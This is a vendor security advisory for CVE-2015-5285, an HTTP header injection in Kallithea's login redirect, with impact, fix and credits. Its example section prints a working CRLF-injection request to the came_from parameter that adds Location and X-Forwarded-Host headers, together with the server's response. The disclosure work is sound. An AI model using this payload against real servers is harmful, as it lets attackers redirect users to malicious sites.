Kallithea Security Notice CVE-2015-5285

HTTP header injection

Synopsis

A vulnerability has been found in Kallithea, allowing attackers to inject arbitrary headers into the server response for certain URLs.

Description

HTTP header injection was possible in login-related code of Kallithea, allowing attackers to inject arbitrary headers into the server responses.

The vulnerability affects the came_from GET parameter.

Example of a malicious request:

GET /_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Host: 192.168.0.28:8080
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.0.28:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

Corresponding response:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
Location: http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress

<html>
 <head>
  <title>302 Found</title>
 </head>
 <body>
  <h1>302 Found</h1>
  The resource was found at <a href="http://192.168.0.28:8080/_admin/1
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk ">http://192.168.0.28:8080/_admin/1
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk </a>;
you should be redirected automatically.


 </body>
</html>

Impact

The bug allows an attacker to override important response headers, possibly redirecting users to a malicious website or make other middleware misbehave when it trusts the response headers.

Resolution

The Kallithea project has fixed this issue in the stable branch. Users are recommended to upgrade to the latest 0.3 release.

Affected versions

The issue is present in Kallithea versions before 0.3.

Acknowledgments

Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue.

References

  1. CVE-2015-5285 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285

  2. Kallithea: Security Notice CVE-2015-5285 https://kallithea-scm.org/security/cve-2015-5285.html

  3. Mercurial changeset fixing the issue https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068

  4. Zero Science Lab http://www.zeroscience.mk/en/